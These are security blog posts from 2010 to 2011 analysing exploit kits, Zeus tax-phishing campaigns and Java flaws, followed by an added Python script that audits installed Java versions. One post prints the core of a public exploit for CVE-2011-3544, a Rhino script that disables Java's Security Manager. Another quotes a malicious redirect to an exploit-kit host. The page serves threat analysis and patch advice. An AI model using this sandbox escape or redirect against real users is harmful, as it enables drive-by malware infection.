Posts Tagged ‘Java’


Prevalent Exploit Kits Updated with a New Java Exploit

By Daniel Chechik  •  December 16th, 2011  •   Cybercrime Malware Vulnerabilities

Until recently, most of the vulnerabilities exploited by popular exploit kits were found last year or even earlier. Moreover, it would take authors at least a month to update their kits with new exploits that had been discovered in the wild. However, in the past few weeks, authors released updated versions of their kits with a recently discovered exploit before a patch had been released.

First, a new version of the Blackhole exploit kit was released, version 1.2.1:

Live Blackhole Exploit Kit control panel

The Blackhole exploit kit presented above was modified to exploit clients that have Java installed, using the recently discovered CVE-2011-3544 vulnerability. This is the only vulnerability that is actually being exploited.

A few days later, a new version of the Phoenix exploit kit, version 3.0, was released, just a few weeks after the release of its predecessor, Phoenix 2.9.

Live Phoenix Exploit Kit 3.0 control panel


Notice the red boxes in the screen shots above: A new exploit was added to those exploit kits, which is the reason for the upgrade.

A few weeks ago Michael ‘mihi’ Schierl described a design error in Java. Basically, this vulnerability is similar to other Java vulnerabilities in which untrusted code is executed with elevated privileges. Rhino is a JavaScript engine that runs inside the JVM and can interact with Java applets. An attacker can bypass the scripting engine’s protection by using a Rhino script to generate an error object that runs with elevated privileges, and then executing code that disables the Security Manager. Once the Security Manager is disabled, the attacker can execute code with full permissions.

Not long after the discovery, an exploit module was published in Metasploit. First, the code creates a Rhino script engine and binds the applet object into it:

import javax.script.*;

ScriptEngine engine = new ScriptEngineManager().getEngineByName("js");
Bindings b = engine.createBindings();
b.put("applet", this);

The Java code then executes a script that bypasses the Security Manager protection by overriding the “toString” method inside the script context:

Object proxy = (Object) engine.eval(
"this.toString = function() {" +
"                      java.lang.System.setSecurityManager(null);" +
"                      applet.callBack();" +
"                      return String.fromCharCode(97 + Math.round(Math.random() * 25));"+
"};" +
"e = new Error();" +
"e.message = this;" +
"e", b);

The script throws an exception, which the Java code catches; the rest of the code is then executed:

catch (ScriptException e) {
e.printStackTrace();
}

The vulnerability is cross-platform and doesn’t require heap spray or buffer overflow techniques. That makes it very effective, so authors of exploit kits rushed to add it to their kits. The most concerning aspect is that the Blackhole exploit kit was updated even before a patch was released by the vendor.

Customers of all versions of M86 Secure Web Gateway are safe, as it provides zero-day protection against this vulnerability by default.

We highly encourage users to keep their Java updated, or to remove it if it is not needed. A patch for this Java vulnerability is now available: look for Java 6 Update 29 or Java 7 Update 1.



Phoenix Exploit Kit (2.7) continues to be updated

By Daniel Chechik  •  June 4th, 2011  •   Cybercrime

A few weeks ago, the Phoenix Exploit Kit 2.5 source code was leaked. At the time, it was not really usable, as it required activation by the author of the exploit kit. It contains an activation page that is used to load all the exploits onto the server for each specific customer. As expected, the author of the exploit kit released a new version of the tool, version 2.7.

Phoenix Exploit’s Kit 2.7 logo


The changes between the two versions are minor, but still very important, as most exploits become ineffective within a very short time, especially with the latest IE vulnerabilities.




Don’t Pay Your Taxes

By Gavin Neale  •  December 5th, 2010  •   Malware

Or at least try to ensure that your money doesn’t end up in the hands of criminals using the Zeus crimeware kit, which could happen if you fall for this latest malicious email campaign targeting taxpayers. The emails are being sent from one of the Pushdo/Cutwail botnets, and the campaign is very similar to the EFTPS one we previously blogged about. The main difference is the use of legitimate hacked websites and a range of exploits targeting vulnerabilities in client-side software such as Java and Adobe PDF readers.

The malicious email claims that your tax payment has been rejected and provides a link for you to check your information:

The link in the email, which appears to go to eftps.gov, actually goes to one of many web pages which have been uploaded to hacked web servers. The pages contain the obfuscated JavaScript shown below:

All of this script has the effect of adding just one new line of JavaScript to the current page: location.replace(“http://[removed]autocom.ru/trafflit.php”). This code tells the browser to navigate to a new URL that is hosting the SEO exploit kit, which contains the JavaScript below.

This JavaScript determines whether Java (Oracle Java, not JavaScript) is enabled and then redirects the browser again, to the page rotator.php on the same server. Rotator.php contains exploits for four Java vulnerabilities and prompts you to download and open the file asshole.pdf. This PDF file, when opened in Adobe Reader, attempts to detect the Reader version and then launches an appropriate exploit if the detected version is known to be vulnerable.

The end goal of all these redirects and exploits is to install the notorious Zeus crimeware bot onto the victim’s machine. This is the VirusTotal report for the Zeus sample we collected. Zeus is well known for helping criminals steal login credentials as victims browse their online bank accounts, and for transferring money into accounts under the criminals’ control.



Don’t Get Infected By Zombies

By Gavin Neale  •  October 15th, 2010  •   Vulnerabilities

Today we had a peek inside an exploit kit known as the Zombie Infection Kit. This kit is not as widely used as some of the more popular kits such as Eleonore and Phoenix, and compared to those kits, Zombie is not really that sophisticated. However, it does carry the usual range of exploits that have been used effectively in many other exploit tool kits. Potential victims are forced to visit Zombie’s exploit page when their browser loads an IFrame placed on a compromised website. All of the vulnerabilities exploited by this kit have been patched by the vendors concerned.

As well as exploiting an old vulnerability in IE 6 and the recent Windows help center vulnerability, the Zombie Infection Kit also uses exploits targeting two Java vulnerabilities, four vulnerabilities in Adobe PDF readers and two vulnerabilities in Adobe Flash.

Success rates for the various exploits used by the Zombie Infection Kit

According to the exploit statistics page in the admin control panel, the two most successful vulnerabilities are in Oracle’s Java, accounting for just over 60 percent of successful infections between them. Following closely behind the Java vulnerabilities is ‘PDF’, which is actually a PDF file containing exploits for four Adobe PDF vulnerabilities; the most recent of these (CVE-2009-4324) has been patched since December 2009.

Another stats page shows a breakdown of victims by browser type, showing the percentage of successful installs for each browser.

Victim browser statistics. The last column is the percentage of successfully infected victims.

This table isn’t really indicative of how secure each browser is, as only Internet Explorer is targeted with browser-specific vulnerabilities, whereas all browsers are used to target vulnerabilities in Adobe Flash, PDF readers and Java.

What this does show is that 15 percent (15.39 in the top row of the browser stats image above) of ‘visitors’ were successfully exploited by the Zombie Infection Kit and made to download a malicious executable. Because Java vulnerabilities accounted for 60 percent of infections, a surprising nine percent of all visitors were infected just by having an old version of Java installed.

Java exploits are becoming increasingly useful for web attackers, as many people don’t even know that Java is installed on their machines, or that it may need to be updated. What is worse is that it is possible to have multiple versions of Java installed on a machine so you can still be vulnerable even after you install the latest version, giving you a false sense of security.

We strongly recommend that users uninstall Java if they don’t use it, or remove old versions and upgrade to the latest version just released by Oracle, which fixes 29 flaws in the previous version for which exploits have recently been published.
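Both the advice above and the December 2011 post (patch levels Java 6 Update 29 and Java 7 Update 1 for CVE-2011-3544) come down to the same check an administrator needs to run: not “is the newest Java patched?” but “is every Java runtime on this host patched?”, because side-by-side installs leave the old version reachable. The following Python script is an added example and is not part of any of these posts or of M86’s tools. It parses the 1.<major>.0_<update> version strings that Sun/Oracle runtimes report (bare, or inside `java -version` output), classifies each against the fix levels named in the post, and flags the host if any runtime is still unpatched. The function names and the sample inventory are constructed for the example; treating majors below 6 as unpatched and majors above 7 as patched is an assumption, not something the posts state.

```python
import re
from typing import List, NamedTuple, Optional, Tuple

# Fix levels for CVE-2011-3544 as stated in the December 2011 post:
# Java 6 Update 29 and Java 7 Update 1, keyed by the "Java N" major.
PATCHED_UPDATE = {6: 29, 7: 1}


class JavaVersion(NamedTuple):
    major: int    # "Java 6" is reported by the runtime as 1.6.0_xx
    update: int   # the _xx update number (0 when absent)

    def __str__(self) -> str:
        return f"Java {self.major} Update {self.update}"


# Matches the 1.<major>.0[_<update>] form used by Sun/Oracle runtimes,
# whether it appears bare ("1.6.0_26") or inside `java -version` output.
_VERSION_RE = re.compile(r'\b1\.(\d)\.0(?:_(\d+))?\b')


def parse_java_version(text: str) -> Optional[JavaVersion]:
    """Extract a JavaVersion from a version string or a `java -version` line.

    Returns None when no recognisable runtime version is present.
    """
    m = _VERSION_RE.search(text)
    if m is None:
        return None
    return JavaVersion(int(m.group(1)), int(m.group(2) or 0))


def is_patched_for_cve_2011_3544(v: JavaVersion) -> bool:
    """True when the runtime is at or above the fix level named in the post.

    Assumptions (not stated on the page): majors below 6 are treated as
    unpatched, majors above 7 as carrying the fix.
    """
    if v.major < 6:
        return False
    if v.major > 7:
        return True
    return v.update >= PATCHED_UPDATE[v.major]


def audit_host(version_strings: List[str]) -> Tuple[List[JavaVersion], List[JavaVersion]]:
    """Classify every runtime found on a host into (vulnerable, patched).

    The point from the October 2010 post: installs live side by side, so a
    host is only safe when every recognised runtime is patched, not merely
    the newest one.
    """
    vulnerable: List[JavaVersion] = []
    patched: List[JavaVersion] = []
    for s in version_strings:
        v = parse_java_version(s)
        if v is None:
            continue   # not a Java runtime version string; ignore it
        (patched if is_patched_for_cve_2011_3544(v) else vulnerable).append(v)
    return vulnerable, patched


def host_is_exposed(version_strings: List[str]) -> bool:
    """A host is exposed if any installed runtime is unpatched."""
    vulnerable, _ = audit_host(version_strings)
    return bool(vulnerable)


# Constructed sample: what an inventory script might collect from one
# workstation that was "upgraded" to Java 7 without removing Java 6.
SAMPLE_HOST = [
    'java version "1.7.0_01"',                                # newest runtime, patched
    '1.6.0_26',                                               # older side-by-side install, still vulnerable
    'Java(TM) SE Runtime Environment (build 1.6.0_29-b11)',   # a Java 6 that was updated
]

if __name__ == "__main__":
    found_vulnerable, found_patched = audit_host(SAMPLE_HOST)
    for v in found_patched:
        print(f"patched:    {v}")
    for v in found_vulnerable:
        print(f"VULNERABLE: {v}  (remove or update this install)")
    print("host exposed" if host_is_exposed(SAMPLE_HOST) else "host clean")
```

Feed it whatever your inventory already produces (registry keys, `java -version` output collected by a login script), one version string per entry; the useful output is the vulnerable list, since an old runtime that is still present is what gives the false sense of security described above.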



Malicious EFTPS Tax campaign

By Phil Hay  •  September 14th, 2010  •   Spam

Today we noticed some unusual-looking messages claiming to be from the Electronic Federal Tax Payment System (EFTPS). Spam with a tax theme always piques our curiosity, so we took a closer look.

